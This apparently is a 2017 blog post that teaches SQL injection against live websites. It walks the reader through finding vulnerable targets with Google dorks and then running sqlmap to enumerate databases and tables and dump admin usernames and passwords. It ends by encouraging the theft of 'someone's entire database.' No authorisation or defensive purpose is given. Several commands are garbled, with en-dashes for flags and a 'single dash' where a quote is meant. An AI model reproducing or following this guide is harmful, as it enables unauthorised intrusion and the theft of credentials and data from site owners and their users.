/ Without Label / Sql injection

Sunday, 29 October 2017

Sql injection

Post oleh : covid-19 | Rilis : October 29, 2017 | Series :

SQL INJECTION TUTORIAL – SQL INJECTION CHEAT SHEET


Sql Injection Tutorial - Sql Injection cheat sheet

Sql injection cheatsheet

SQL Injection Tutorial – Sql Injection cheat sheet . SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website.  The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and Kali Linux.

Step 1 – Download Python for Windows

https://www.python.org/downloads/release/python-2710/

Step 2 – Download SQLMAP for Windows

http://sqlmap.org/

Install to C:/SQLMAP

Step 3 – Find a vulnerable website

Use Google Dorks.  Search for the dorks, like the one in example down below.

php?=id1

Browse to the website and then put a single dash at the end of the url. so it reads

php?=id1′

Hit Enter, If you get an error the website is vulnerable.

Get Here: 2000+ Google Dorks For SQL Injection

Step 4 – Run SQLMAP Wizard on Windows

Open a command prompt. and run this command

cd c:\SQLMAP

look for a second sqlmap-project-sqlmap-xxxx directory.

cd sqlmap-project-sqlmap-xxxx

here you’ll see sqlmap.py listed…  this is python script to be run.

sqlmap.py –wizard

Enter The Dork of the Website – including the id=1

Select Injection Difficulty  (default)

Go for defaults to start off with.

Select Enumeration level

Full enumeration of the database would be level 3- as shown

See Also: Automatic SQL Injection With jSql [FREE TOOL]

Step 5 – ATTACK CODES

SQLMAP will report the OS used in Web Server first – regardless of what attack code is used.

How do we extract all databases?

http://www.website.com/page.php?id=1 –dbs

Look for how many databases there are, and how many tables!!

How do we extract Tables?

http://www.website.com/page.php?id=1 –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

Here we find 11 tables.

Now that we can read the tables, we can start to dump the data out.

How do we get usernames?

http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump

Look for “admin”

How to get all the Login details?

http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

Step 6 – Get Passwords (of Admin)

http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

The Last You Can Do Is Stealing Someone’s Entire Database.

google+

linkedin

Subscribe to: Post Comments (Atom)
Cyber Ghost. Powered by Blogger.